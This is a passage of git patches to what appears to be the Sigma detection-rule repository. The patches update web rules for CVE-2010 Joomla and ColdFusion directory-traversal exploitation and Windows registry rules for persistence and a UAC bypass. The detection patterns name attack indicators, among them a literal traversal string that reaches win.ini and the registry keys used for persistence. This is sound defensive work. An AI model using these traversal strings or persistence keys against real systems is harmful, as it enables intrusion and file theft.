@@ description: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion:Direc local files via a .. (dot dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1719_exploitation_attempt.yml b/rules/web/web_cve-2010-1719_exploitation_attempt.yml index ad0528de..c5589c7f 100644 --- a/rules/web/web_cve-2010-1719_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1719_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1719 Exploitation Attempt -id: 7e6667ad-773d-430f-803e-b0434e1a18b0 +id: 77d936f8-0b09-4996-bb2e-52893a34f91f author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion:Director other impact via a .. (dot dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1722_exploitation_attempt.yml b/rules/web/web_cve-2010-1722_exploitation_attempt.yml index 915152b4..98629be1 100644 --- a/rules/web/web_cve-2010-1722_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1722_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1722 Exploitation Attempt -id: b6b08f77-dd85-43a1-aba7-2c5019de2cbb +id: 26b7051c-48b7-4212-ac5e-c8799fe80bdf author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Online Market 2.x - Local File Inclusion:Director impact via a .. (dot dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1875_exploitation_attempt.yml b/rules/web/web_cve-2010-1875_exploitation_attempt.yml index 3327818d..fff7c165 100644 --- a/rules/web/web_cve-2010-1875_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1875_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1875 Exploitation Attempt -id: dd496a1a-4d1a-466b-961a-c5ec583d9c2a +id: 28aadbf4-5125-4e7c-9f79-c907363bebd2 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Property - Local File Inclusion:Directory travers other impact via a .. (dot dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1953_exploitation_attempt.yml b/rules/web/web_cve-2010-1953_exploitation_attempt.yml index 44324f9c..68fd370b 100644 --- a/rules/web/web_cve-2010-1953_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1953_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1953 Exploitation Attempt -id: 57d8ec13-203c-41fd-ab1f-1faae9b50704 +id: ebcd435e-0ed6-4d35-b08f-d5a875608f82 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1954_exploitation_attempt.yml b/rules/web/web_cve-2010-1954_exploitation_attempt.yml index b8a24efb..1da216a2 100644 --- a/rules/web/web_cve-2010-1954_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1954_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1954 Exploitation Attempt -id: 75db8c01-6053-40f5-bde9-3eb9b58c6993 +id: 651421c8-279e-4813-954e-64b9d05d1a06 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusio (dot dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1955_exploitation_attempt.yml b/rules/web/web_cve-2010-1955_exploitation_attempt.yml index 5d45ec58..abdda4f9 100644 --- a/rules/web/web_cve-2010-1955_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1955_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1955 Exploitation Attempt -id: c6c7a6f6-53ae-4dd9-b765-369572746618 +id: ed851f14-5b09-4463-bd9b-75bade8718ff author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion: the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1956_exploitation_attempt.yml b/rules/web/web_cve-2010-1956_exploitation_attempt.yml index be22f9f4..448c125f 100644 --- a/rules/web/web_cve-2010-1956_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1956_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1956 Exploitation Attempt -id: 45c57364-0925-43c7-8340-2a4a3d57d080 +id: 19d87410-0d59-4176-b0f2-65c2e33c07e7 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion:Direc dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1979_exploitation_attempt.yml b/rules/web/web_cve-2010-1979_exploitation_attempt.yml index 44b2760f..1ecb9b3b 100644 --- a/rules/web/web_cve-2010-1979_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1979_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1979 Exploitation Attempt -id: 26d368fb-6ba7-42c0-9fdd-cb704c9b5762 +id: 924df1b0-04f2-4e4a-b638-519a6eb3d4e5 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion:Di in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1980_exploitation_attempt.yml b/rules/web/web_cve-2010-1980_exploitation_attempt.yml index 74f85631..c142f120 100644 --- a/rules/web/web_cve-2010-1980_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1980_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1980 Exploitation Attempt -id: a3003789-08e5-43c3-bf3b-a41498b626be +id: f6af8453-b1d9-4714-a005-fd231d940855 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion:Directo local files via a .. (dot dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1981_exploitation_attempt.yml b/rules/web/web_cve-2010-1981_exploitation_attempt.yml index 61351d14..a66a6582 100644 --- a/rules/web/web_cve-2010-1981_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1981_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1981 Exploitation Attempt -id: 4819d179-2307-4d81-a96a-a6af63583c90 +id: c0bc20f5-f9f7-4019-83fd-19398acdfb0a author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Fabrik 2.0 - Local File Inclusion:Directory trave to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-1983_exploitation_attempt.yml b/rules/web/web_cve-2010-1983_exploitation_attempt.yml index 89e35f9f..208e28d0 100644 --- a/rules/web/web_cve-2010-1983_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1983_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1983 Exploitation Attempt -id: 34aeb1ba-e6a1-47d8-b705-89f21530c0bc +id: 113530a7-3288-4f04-887d-127c962e0415 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component redTWITTER 1.0 - Local File Inclusion:Directory t the view parameter to index.php references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-2033_exploitation_attempt.yml b/rules/web/web_cve-2010-2033_exploitation_attempt.yml index 4d19b0ba..133697d2 100644 --- a/rules/web/web_cve-2010-2033_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-2033_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-2033 Exploitation Attempt -id: 6fe83c91-50fa-4715-abeb-56db4494f0d6 +id: 8081629e-b3a0-4abc-b254-1cdf6cd8f9c8 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla Percha Categories Tree 0.6 - Local File Inclusion:Directory other impact via a .. (dot dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-2034_exploitation_attempt.yml b/rules/web/web_cve-2010-2034_exploitation_attempt.yml index e4c6c576..55fa1106 100644 --- a/rules/web/web_cve-2010-2034_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-2034_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-2034 Exploitation Attempt -id: ac5d3e21-b01f-4bd3-b541-96107ca1a575 +id: af8a99cc-e237-405f-a399-dd3d81109c90 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Percha Image Attach 1.1 - Directory Traversal:Dir unspecified other impact via a .. (dot dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-2035_exploitation_attempt.yml b/rules/web/web_cve-2010-2035_exploitation_attempt.yml index 5dc18fac..ab08ba81 100644 --- a/rules/web/web_cve-2010-2035_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-2035_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-2035 Exploitation Attempt -id: a3d33778-c46a-4c7f-93d0-32fa6f44f216 +id: 58483eec-3415-4b3a-958b-5107727a3388 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal:Dir unspecified other impact via a .. (dot dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-2036_exploitation_attempt.yml b/rules/web/web_cve-2010-2036_exploitation_attempt.yml index 213ad9a8..0d46db2a 100644 --- a/rules/web/web_cve-2010-2036_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-2036_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-2036 Exploitation Attempt -id: ab306706-061e-418d-bcda-f2350f713aa3 +id: e5fa9960-e1c3-4f95-93c0-66e3c29bd5d8 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal:Di unspecified other impact via a .. (dot dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-2122_exploitation_attempt.yml b/rules/web/web_cve-2010-2122_exploitation_attempt.yml index cbf7c4a1..015f44d8 100644 --- a/rules/web/web_cve-2010-2122_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-2122_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-2122 Exploitation Attempt -id: 9c26c662-bd83-453c-bee6-af9ec135f0ed +id: be413e66-166e-42bb-875d-72552abfe774 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component simpledownload 0.9.5 - Local File Disclosure:Dire files via a .. (dot dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-2259_exploitation_attempt.yml b/rules/web/web_cve-2010-2259_exploitation_attempt.yml index f270d25c..32350c5d 100644 --- a/rules/web/web_cve-2010-2259_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-2259_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-2259 Exploitation Attempt -id: 5122163e-68ae-4091-becc-1ce76da87818 +id: c26a4ac4-9dff-47b3-a602-70eb83aad468 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component com_bfsurvey - Local File Inclusion:Directory tra controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-2307_exploitation_attempt.yml b/rules/web/web_cve-2010-2307_exploitation_attempt.yml index aa36c44e..91eeaa63 100644 --- a/rules/web/web_cve-2010-2307_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-2307_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-2307 Exploitation Attempt -id: 5ca51722-d5ab-4fd2-8019-d86ab7c4ab06 +id: dd54adb6-05b1-40d6-a609-d5c8f3745853 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -10,6 +10,8 @@ description: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-2682_exploitation_attempt.yml b/rules/web/web_cve-2010-2682_exploitation_attempt.yml index e37ba64c..3f464d30 100644 --- a/rules/web/web_cve-2010-2682_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-2682_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-2682 Exploitation Attempt -id: 9523ed0f-8d29-43d2-ba03-80021ca432e9 +id: 74bbe7ca-4136-46a2-a5fd-f521b0c773b3 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion other impact via a .. (dot dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-2861_exploitation_attempt.yml b/rules/web/web_cve-2010-2861_exploitation_attempt.yml index 02c606e5..8477110d 100644 --- a/rules/web/web_cve-2010-2861_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-2861_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-2861 Exploitation Attempt -id: fe01aa56-4e1f-4a9e-8a91-a54ecb03337e +id: b7f12d62-4aa3-48aa-bfbf-5a12966ebed9 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -10,6 +10,8 @@ description: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI:Multiple directory travers and (5) enter.cfm in CFIDE/administrator/. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-2920_exploitation_attempt.yml b/rules/web/web_cve-2010-2920_exploitation_attempt.yml index fcae4a86..32a850de 100644 --- a/rules/web/web_cve-2010-2920_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-2920_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-2920 Exploitation Attempt -id: 06d7adfa-1797-499d-a070-afb10935ac16 +id: c4bdce4d-6a3c-4760-be05-a3bf923f7f0e author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion traversal sequences in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-3426_exploitation_attempt.yml b/rules/web/web_cve-2010-3426_exploitation_attempt.yml index a5571a8d..69f3ca3f 100644 --- a/rules/web/web_cve-2010-3426_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-3426_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-3426 Exploitation Attempt -id: 2cb7c37d-e5a6-4dee-a34f-7b96ea217d5b +id: 4387e23a-0022-454e-8f9a-e2f19b97fbce author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion:Directo via a .. (dot dot) in the controller parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-4231_exploitation_attempt.yml b/rules/web/web_cve-2010-4231_exploitation_attempt.yml index 216b3351..a04663df 100644 --- a/rules/web/web_cve-2010-4231_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-4231_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-4231 Exploitation Attempt -id: dbf4c46f-5581-4cbd-8f31-7183bd7bc9eb +id: 7f38b244-d9e1-4ad4-a4c2-326accaefbfd author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -8,6 +8,8 @@ description: Camtron CMNC-200 IP Camera - Directory Traversal:The CMNC-200 IP Ca directory transversal attacks, allowing access to any file on the camera file system. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-4617_exploitation_attempt.yml b/rules/web/web_cve-2010-4617_exploitation_attempt.yml index 8664cee0..9cb15eca 100644 --- a/rules/web/web_cve-2010-4617_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-4617_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-4617 Exploitation Attempt -id: 6e5bcbec-b693-4dc2-b093-38e07d0dd405 +id: 62a7a20d-34f2-4b54-962b-539f17723730 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: Joomla! Component JotLoader 2.2.1 - Local File Inclusion:Directory section parameter to index.php. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve-2010-5278_exploitation_attempt.yml b/rules/web/web_cve-2010-5278_exploitation_attempt.yml index 9226d793..0e99c6b3 100644 --- a/rules/web/web_cve-2010-5278_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-5278_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-5278 Exploitation Attempt -id: 88280398-c4a7-498f-9652-86d2448418d1 +id: a4a899e8-fd7a-49dd-b5a8-7044def72d61 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental @@ -9,6 +9,8 @@ description: MODx manager - Local File Inclusion:Directory traversal vulnerabili read arbitrary files via a .. (dot dot) in the class_key parameter. references: - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver detection: selection: c-uri|contains: diff --git a/rules/web/web_cve_2010_5278_exploitation_attempt.yml b/rules/web/web_cve_2010_5278_exploitation_attempt.yml deleted file mode 100644 index 3540cbf3..00000000 --- a/rules/web/web_cve_2010_5278_exploitation_attempt.yml +++ /dev/null @@ -1,24 +0,0 @@ -title: CVE-2010-5278 Joomla JaShowcase Exploitation Attempt -id: 55a72ccd-4f16-42a7-afc8-f7958035bf90 -author: Subhash Popuri (@pbssubhash) -date: 2021/08/25 -status: experimental -description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php - in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, - allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key - parameter. -references: - - https://www.exploit-db.com/exploits/34788 - - https://www.cvedetails.com/cve/CVE-2010-5278 - - https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: '/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00' - condition: selection -false_positives: - - Scanning from Nuclei - - Penetration Testing Activity -tags: - - attack.initial_access - - attack.t1190 -level: critical diff --git a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml index 702dcf29..79718f93 100644 --- a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml +++ b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml @@ -1,13 +1,13 @@ title: Powerup Write Hijack DLL id: 602a1f13-c640-4d73-b053-be9a2fa58b96 status: experimental -description: | +description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default). references: - https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/ -author: pbssubhash +author: Subhash Popuri (@pbssubhash) date: 2021/08/21 tags: - attack.persistence From 9576663789917e1353ff7360160cd73f39e3afe8 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 13 Sep 2021 15:23:38 +0700 Subject: [PATCH 0926/1367] Update web_cve_2021_40539_manageengine_adselfservice_exploit.yml Edit My Teammate --- .../web_cve_2021_40539_manageengine_adselfservice_exploit.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml b/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml index a0ff44c9..f678cfef 100644 --- a/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml +++ b/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml @@ -5,7 +5,7 @@ description: Detects an authentication bypass vulnerability affecting the REST A references: - https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/ - https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html -author: Sittikorn S, Nuttakorn L +author: Sittikorn S, Nuttakorn Tungpoonsup date: 2021/09/10 tags: - attack.initial_access From 7386904e42391429dd3ca93aaad004b9f9e328f4 Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 13 Sep 2021 15:33:14 +0700 Subject: [PATCH 0927/1367] Update win_file_winword_cve_2021_40444.yml Add new condition --- .../file_event/win_file_winword_cve_2021_40444.yml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/rules/windows/file_event/win_file_winword_cve_2021_40444.yml b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml index 4eacdf8a..01d06076 100644 --- a/rules/windows/file_event/win_file_winword_cve_2021_40444.yml +++ b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml @@ -4,7 +4,8 @@ status: experimental description: Detects file creation patterns noticable during the exploitation of CVE-2021-40444 references: - https://twitter.com/RonnyTNL/status/1436334640617373699?s=20 -author: Florian Roth + - https://twitter.com/vanitasnk/status/1437329511142420483?s=21 +author: Florian Roth, Sittikorn S date: 2021/09/10 logsource: product: windows @@ -14,10 +15,14 @@ detection: Image: '\winword.exe' TargetFilename|endswith: '.cab' TargetFilename|contains: '\Windows\INetCache' - condition: selection + selection_inf: + Image: '\winword.exe' + TargetFilename|contains: + - '\AppData\Local\Temp\' + - '.inf' + condition: selection or selection_inf fields: - TargetFilename falsepositives: - unknown level: critical - From 5977596e65bb4ef8326484f6b0f2d42355aa802d Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 13 Sep 2021 16:05:22 +0700 Subject: [PATCH 0928/1367] Update win_file_winword_cve_2021_40444.yml --- rules/windows/file_event/win_file_winword_cve_2021_40444.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/win_file_winword_cve_2021_40444.yml b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml index 01d06076..77721735 100644 --- a/rules/windows/file_event/win_file_winword_cve_2021_40444.yml +++ b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml @@ -17,7 +17,7 @@ detection: TargetFilename|contains: '\Windows\INetCache' selection_inf: Image: '\winword.exe' - TargetFilename|contains: + TargetFilename|contains|all: - '\AppData\Local\Temp\' - '.inf' condition: selection or selection_inf From edd5c2745e7532047d610d000a60827901d77dda Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Mon, 13 Sep 2021 16:05:56 +0700 Subject: [PATCH 0929/1367] Update win_file_winword_cve_2021_40444.yml change TargetFilename|contains|all --- rules/windows/file_event/win_file_winword_cve_2021_40444.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/win_file_winword_cve_2021_40444.yml b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml index 77721735..1c20b1f8 100644 --- a/rules/windows/file_event/win_file_winword_cve_2021_40444.yml +++ b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml @@ -17,7 +17,7 @@ detection: TargetFilename|contains: '\Windows\INetCache' selection_inf: Image: '\winword.exe' - TargetFilename|contains|all: + TargetFilename|contains|all: - '\AppData\Local\Temp\' - '.inf' condition: selection or selection_inf From bd3b1323b4a04b551ecc6e78d8ff0fff6f26ff32 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 13 Sep 2021 12:45:10 +0200 Subject: [PATCH 0930/1367] fix TargetObject HKCU --- .../registry_event/registry_event_uac_bypass_eventvwr.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml b/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml index bdbd285e..01603e58 100755 --- a/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml +++ b/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml @@ -19,9 +19,9 @@ logsource: category: registry_event detection: methregistry: - TargetObject|startswith: 'HKU\' + TargetObject|startswith: 'HKCU\' TargetObject|endswith: '\mscfile\shell\open\command' condition: methregistry falsepositives: - unknown -level: critical \ No newline at end of file +level: critical From 7b6ae81b8bae2d69ee80bea0a94a91cb7fd0fc67 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 13 Sep 2021 13:16:16 +0200 Subject: [PATCH 0931/1367] fix TargetObject HK --- rules/windows/registry_event/sysmon_apt_leviathan.yml | 4 ++-- rules/windows/registry_event/sysmon_office_test_regadd.yml | 5 +++-- rules/windows/registry_event/win_outlook_c2_registry_key.yml | 3 ++- rules/windows/registry_event/win_portproxy_registry_key.yml | 3 ++- 4 files changed, 9 insertions(+), 6 deletions(-) diff --git a/rules/windows/registry_event/sysmon_apt_leviathan.yml b/rules/windows/registry_event/sysmon_apt_leviathan.yml index 9331bcc5..c3241918 100644 --- a/rules/windows/registry_event/sysmon_apt_leviathan.yml +++ b/rules/windows/registry_event/sysmon_apt_leviathan.yml @@ -10,12 +10,12 @@ tags: - attack.t1547.001 author: Aidan Bracher date: 2020/07/07 -modified: 2020/09/06 +modified: 2021/09/13 logsource: category: registry_event product: windows detection: selection: - TargetObject: 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ntkd' + TargetObject: 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntkd' condition: selection level: critical diff --git a/rules/windows/registry_event/sysmon_office_test_regadd.yml b/rules/windows/registry_event/sysmon_office_test_regadd.yml index f8ec6212..601ba1c9 100644 --- a/rules/windows/registry_event/sysmon_office_test_regadd.yml +++ b/rules/windows/registry_event/sysmon_office_test_regadd.yml @@ -9,14 +9,15 @@ tags: - attack.persistence - attack.t1137.002 date: 2020/10/25 +modified: 2021/09/13 logsource: category: registry_event product: windows detection: selection_registry: TargetObject: - - 'HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf' - - 'HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf' + - 'HKCU\Software\Microsoft\Office test\Special\Perf' + - 'HKLM\Software\Microsoft\Office test\Special\Perf' condition: selection_registry falsepositives: - Unlikely diff --git a/rules/windows/registry_event/win_outlook_c2_registry_key.yml b/rules/windows/registry_event/win_outlook_c2_registry_key.yml index 4d652427..148886a9 100644 --- a/rules/windows/registry_event/win_outlook_c2_registry_key.yml +++ b/rules/windows/registry_event/win_outlook_c2_registry_key.yml @@ -12,12 +12,13 @@ tags: - attack.t1008 - attack.t1546 date: 2021/04/05 +modified: 2021/09/13 logsource: category: registry_event product: windows detection: selection_registry: - TargetObject: 'HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level' + TargetObject: 'HKCU\Software\Microsoft\Office\16.0\Outlook\Security\Level' Details|contains: '0x00000001' condition: selection_registry falsepositives: diff --git a/rules/windows/registry_event/win_portproxy_registry_key.yml b/rules/windows/registry_event/win_portproxy_registry_key.yml index 2559c620..dfea626f 100644 --- 